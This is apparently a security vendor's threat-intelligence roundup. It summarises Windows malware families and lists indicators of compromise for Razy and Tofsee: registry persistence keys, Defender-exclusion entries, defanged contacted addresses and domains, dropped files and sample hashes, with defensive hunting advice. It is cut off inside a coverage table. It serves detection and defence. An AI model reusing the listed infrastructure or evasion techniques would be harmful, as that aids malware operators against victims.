An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

- **Win.Trojan.Razy-7505643-0** (Trojan): Razy is often a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples persist by creating an auto-execute value in the registry.
- **Win.Dropper.Tofsee-7492214-1** (Dropper): Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet.
- **Win.Packed.Ursnif-7489213-0** (Packed): Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
- **Win.Packed.ZeroAccess-7489468-1** (Packed): ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine, and serves as a platform for conducting click-fraud campaigns.
- **Win.Ransomware.TeslaCrypt-7501245-1** (Ransomware): TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service.
  A flaw in the encryption implementation was discovered that allowed files to be decrypted without paying the ransom, and eventually the malware developers released the master key, allowing all encrypted files to be recovered easily.
- **Win.Dropper.Upatre-7491797-0** (Dropper): Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
- **Win.Dropper.TrickBot-7490964-0** (Dropper): TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
- **Win.Packed.Formbook-7491272-1** (Packed): Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.

* * *

## Threat Breakdown

### Win.Trojan.Razy-7505643-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE` (value name: Blob) | 11
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\SETTINGS\LEAKDIAGNOSISATTEMPTED` | 7
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED` (value name: Hidden) | 3
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\1C3DDA8020173A5B45A7C80CFC8B0298.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\0748AF3992DE6E3AA7B386B7F6C08EF2.EXE` (value name: LastDetectionTime) | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\2AA87EE2B7BAA7D413CC747537A867A2.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\1C3DDA8020173A5B45A7C80CFC8B0298.EXE` (value name: LastDetectionTime) | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\EB9064AF85850CF7B3485B2A911798D7.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\B4F3AEA9F95879ABBE9B311B5AB9FC30.EXE` (value name: LastDetectionTime) | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\2AA87EE2B7BAA7D413CC747537A867A2.EXE` (value name: LastDetectionTime) | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\EB9064AF85850CF7B3485B2A911798D7.EXE` (value name: LastDetectionTime) | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE` (value name: goodsStartup key) | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\6035E0F59A5169E7C59129A3CDBD076E.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\6035E0F59A5169E7C59129A3CDBD076E.EXE` (value name: LastDetectionTime) | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE` (value name: goods) | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\0786B90DA12B29B5CC97621DCC78FA3E.EXE` | 1
`<HKLM>\SOFTWARE\MICROSOFT\RADAR\HEAPLEAKDETECTION\DIAGNOSEDAPPLICATIONS\0786B90DA12B29B5CC97621DCC78FA3E.EXE` (value name: LastDetectionTime) | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE` (value name: mrke) | 1

The `RADAR\HEAPLEAKDETECTION` and `AUTHROOT\CERTIFICATES` entries are written by Windows itself (heap-leak diagnostics and automatic root-certificate updating) as a side effect of running the samples; the `RUNONCE` values are the malware's own persistence and are the entries worth hunting for.

Mutexes | Occurrences
---|---
`Global\14c64321-2d62-11ea-a007-00501e3ae7b5` | 1

IP Addresses contacted by malware.
Does not indicate maliciousness | Occurrences
---|---
`172[.]217[.]12[.]206` | 10
`172[.]217[.]9[.]225` | 7
`172[.]217[.]5[.]238` | 6
`104[.]16[.]155[.]36` | 3
`77[.]88[.]21[.]158` | 3
`172[.]217[.]10[.]46` | 1
`172[.]217[.]10[.]33` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`smtp[.]yandex[.]com` | 3
`whatismyipaddress[.]com` | 3
`doc-00-6c-docs[.]googleusercontent[.]com` | 1
`doc-0s-9s-docs[.]googleusercontent[.]com` | 1
`doc-14-60-docs[.]googleusercontent[.]com` | 1
`doc-0k-c8-docs[.]googleusercontent[.]com` | 1
`doc-00-5o-docs[.]googleusercontent[.]com` | 1
`doc-10-6c-docs[.]googleusercontent[.]com` | 1
`doc-04-bg-docs[.]googleusercontent[.]com` | 1
`doc-04-6c-docs[.]googleusercontent[.]com` | 1

The `googleusercontent[.]com` names and the `172[.]217[.]*` addresses are shared Google infrastructure (the `doc-*` hosts serve Google Docs/Drive downloads, consistent with the samples fetching a payload or configuration from there); `smtp[.]yandex[.]com` is consistent with sending the collected data out over SMTP, and `whatismyipaddress[.]com` is a public-address lookup. Only the last two are reasonable alert triggers on their own, and even those should be corroborated with the host-side indicators.

Files and or directories created | Occurrences
---|---
`%APPDATA%\pid.txt` | 3
`%APPDATA%\pidloc.txt` | 3
`%TEMP%\holdermail.txt` | 3
`%TEMP%\holderwb.txt` | 3
`%HOMEPATH%\desktop\product.pif` | 2
`%TEMP%\bhv61AB.tmp` | 1
`%TEMP%\bhv8DF6.tmp` | 1
`%HOMEPATH%\Orkende` | 1
`%HOMEPATH%\Orkende\Recomm.pif` | 1
`%TEMP%\bhv5953.tmp` | 1

#### File Hashes

`3031363a67eca33c68892ed7529803bbaa926a6f371204eeaa8ca205501d8cac`
`34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93`
`51e97032af43de44947d564ee43a9b43278312873caaa4bbd7d3e4f7ec00eb89`
`58962a9133651591f2d4df22589d1cdd4f7cee175f70c7d47c5a854a5264ec98`
`5be87b343f2d3af80883ed4deb795c0ae8f7e0ae4ba08a6bbac5b3e4659d0341`
`6bd1baae5ba600ff4ece4523e53bf9818bcc381a56664e3104c1c317d6f5a3bc`
`6dfdb201ddd46c8f2ded273f3c8ed6c5beca63196b5428fe388f59faaac79597`
`731aa2659852eb9b98d573b3f59436b49c15492d8df94e18da5a8f4c41f48fbe`
`79acdd5ea559b2e7e29fa6b47ca1053e11dbaadf540fc2b140aca89d1539d17e`
`8fa302841d886e0198c96d76d93399f5905844f424b255e6707a74ea610c55ce`
`cdaef1b003e82f8994dd616103781125fca98ec097ee79830c2262f41158237a`

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

[AMP detection screenshot](<https://1.bp.blogspot.com/-MHJh8tA_x9o/XhjbFSHPYiI/AAAAAAAADFU/6vgp_DT_TBw5sncscgE1kUlKvtjc_gI0ACLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_amp.png>)

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-YOqwN9OAMNc/XhjbJu1E0bI/AAAAAAAADFY/oGYUIcxuUSIoBIPFIKTTnZ_0Nz4zHEWAwCLcBGAsYHQ/s1600/34b978969d994134de71dd45996dc5d10516e534e23a2abb8537a1c548ac1c93_tg.png>)

* * *

### Win.Dropper.Tofsee-7492214-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` | 192
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (value name: Config3) | 175
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: Type) | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: Start) | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: ErrorControl) | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: DisplayName) | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: WOW64) | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: ObjectName) | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: Description) | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` | 158
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` (value name: ImagePath) | 68
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` (value name: C:\Windows\SysWOW64\wpdjiqwl) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` (value name: Type) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` (value name: Start) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` (value name: ErrorControl) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` (value name: DisplayName) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` (value name: WOW64) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` (value name: ObjectName) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDJIQWL` (value name: Description) | 11
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` (value name: C:\Windows\SysWOW64\lesyxfla) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` (value name: Type) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` (value name: Start) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` (value name: ErrorControl) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` (value name: DisplayName) | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LESYXFLA` (value name: WOW64) | 11

Two things in this table are worth an alert rule on their own: the sample installs itself as a Windows service with a random eight-character name under `SysWOW64`, and it adds that binary's path to `WINDOWS DEFENDER\EXCLUSIONS\PATHS` so Defender will not scan it. A Defender exclusion created by anything other than your own management tooling is suspicious on any host (the Microsoft-Windows-Windows Defender/Operational log records configuration changes as event ID 5007).

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`69[.]55[.]5[.]250` | 192
`43[.]231[.]4[.]6/31` | 192
`85[.]114[.]134[.]88` | 192
`239[.]255[.]255[.]250` | 175
`46[.]4[.]52[.]109` | 175
`46[.]28[.]66[.]2` | 175
`78[.]31[.]67[.]23` | 175
`188[.]165[.]238[.]150`| 175
`93[.]179[.]69[.]109` | 175
`176[.]9[.]114[.]177` | 175
`192[.]0[.]47[.]59` | 174
`172[.]217[.]12[.]164` | 159
`74[.]125[.]192[.]26/31` | 140
`67[.]195[.]204[.]72/30` | 135
`168[.]95[.]5[.]116/31` | 134
`172[.]217[.]197[.]26/31` | 122
`172[.]217[.]10[.]67` | 116
`216[.]146[.]35[.]35` | 110
`212[.]227[.]15[.]40/31` | 104
`104[.]47[.]54[.]36` | 102
`208[.]76[.]51[.]51` | 101
`168[.]95[.]6[.]60/30` | 97
`98[.]136[.]96[.]92/31` | 95
`31[.]13[.]66[.]174` | 93
`98[.]136[.]96[.]74/31` | 91

*See JSON for more IOCs

Domain Names contacted by malware.
Does not indicate maliciousness | Occurrences
---|---
`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 192
`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 192
`schema[.]org` | 175
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 175
`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 175
`mta5[.]am0[.]yahoodns[.]net` | 175
`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 175
`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 175
`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 175
`whois[.]iana[.]org` | 174
`whois[.]arin[.]net` | 173
`coolsex-finders6[.]com` | 173
`bestladies[.]cn` | 173
`bestdates[.]cn` | 173
`bestgirlsdates[.]cn` | 173
`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 171
`eur[.]olc[.]protection[.]outlook[.]com` | 127
`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 125
`ipinfo[.]io` | 118
`nam[.]olc[.]protection[.]outlook[.]com` | 93
`mx6[.]earthlink[.]net` | 91
`pkvw-mx[.]msg[.]pkvw[.]co[.]charter[.]net` | 88
`charter[.]net` | 87
`mx0[.]charter[.]net` | 87
`msn-com[.]olc[.]protection[.]outlook[.]com` | 72

*See JSON for more IOCs

The `250[.]5[.]55[.]69[.]...` names are reversed-octet lookups of `69[.]55[.]5[.]250` (the first address in the IP table) against the PTR zone and the Spamhaus, CBL, SORBS and SpamCop blocklists, which is how a mail sender checks whether its own address is already blocklisted before it starts sending; the `outlook[.]com`, `yahoodns[.]net`, `earthlink[.]net` and `charter[.]net` names are the MX hosts of the spam recipients. A workstation querying DNSBL zones at all is a strong signal, since only mail servers have a reason to do so.

Files and or directories created | Occurrences
---|---
`%SystemRoot%\SysWOW64\config\systemprofile` | 192
`%SystemRoot%\SysWOW64\config\systemprofile:.repos` | 192
`%TEMP%\<random, matching '[a-z]{8}'>.exe` | 188
`%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>` | 158
`%HOMEPATH%` | 59
`%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)` | 59
`%SystemRoot%\SysWOW64\wpdjiqwl` | 11
`%SystemRoot%\SysWOW64\lesyxfla` | 11
`%SystemRoot%\SysWOW64\mftzygmb` | 10
`%SystemRoot%\SysWOW64\piwcbjpe` | 10
`%SystemRoot%\SysWOW64\zsgmltzo` | 10
`%SystemRoot%\SysWOW64\yrflksyn` | 10
`%TEMP%\<random, matching '[a-z]{4,9}'>.exe` | 9

`systemprofile:.repos` is an NTFS alternate data stream attached to the `systemprofile` directory; a plain directory listing will not show it, but `dir /r` or `Get-Item -Path <dir> -Stream *` will.

#### File Hashes

`03dfa2a7b5722d6fa2f2f85287c8bea67b2ae1c8be2d9de90b33c2b4dd3c0f42`
`07314be6c87366f215030d7a2af42440f8a2a187e782ad975a476a84aa389fe1`
`0862506904a93aba08781be3d9b5189c8cc01bc5fd86d9a4881bd114449502b7`
`088fe0b34e1db5b9010adb26a2380aa6faf53165f9e2d7d986fd0bc6be614f9e`
`0ad21f45614d3112c1201ff8a5b3fe702b4943e39ab9d8bc4f38362565c373d5`
`0b2c1eebcd3f136c556a8568541d589f691dbe6fb450fa708e9774f4ca72fb67`
`10d2a79f8c199a6ce16b0e3fd4a911524cc2ece755daf67c04f0d3118dfb3498`
`11e2d71f1dab632b58c9ab60a48c51854d59df47456a97ff9ef59c72b607229c`
`136e082449131aae0a3e28c21c99aaef24a9d1709cae71daee0e154bf2b45d9f`
`144d2f639c9dafd40f48b72980609cb018ca83a360b7e24fede6023e0e742397`
`16f778581e678fdd5e21442d3d55bcc4415271ac94ed0d31c2efd40c772f26ec`
`1733e36d0e55b369c97e387fa74da22462fbf1858b09befb5de125d9523e3d41`
`1756a1f4ce0593f80b857ed9a654c656dac96d3405a566dc38737e0a79bc194d`
`188389b2163b98dbb96edf4000496dacc062f2a6ae2dd021a3f49742d36a2e0b`
`189f32c3d78e9b129d62bb4e40b3693da216cc371018d5ce4ef2356a94ca4f6e`
`18f25a4e071f993b9ceac935a3814d7667e42c46d22ea9e8ccd7c4a3f0087f7b`
`1a747af4f485eb3c8c475c9dcd9cac9d7fe279f3f45777d793572c4927e07ffa`
`1af4c3359d224c2ad2006db3c9786afdeeb90404ab91ec7c63467092264e2183`
`1c1d1c939fd6d3e6a77c2fa342f2c39433eea8f9d3c749ecee42e287734bd330`
`1c69825459d03fb13956e1a0f40e485731fbe96e48efe1abc765db537fec77ba`
`1d3aecb8b67bd70634fbffcf15b5e21ef0ee95627d296e78caf3f07842820d9a`
`1d9d2d4000df6baadc93db56dbdc783c9db35a047be86bed8d4bfaacb33b6a9c`
`1f42ceba5e533e7aeb5395e1db11ef780b02e44c8cde237394b663b816da69b4`
`1ff0ce00b3cc5e3223e31501e16302b44ae24981b4b61f3500bdba2f671a057f`
`20f52e7aa1ee2e27dffcb75eb1e207681dbe2f72d44b0f4d2f66498102d8cf8e`

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 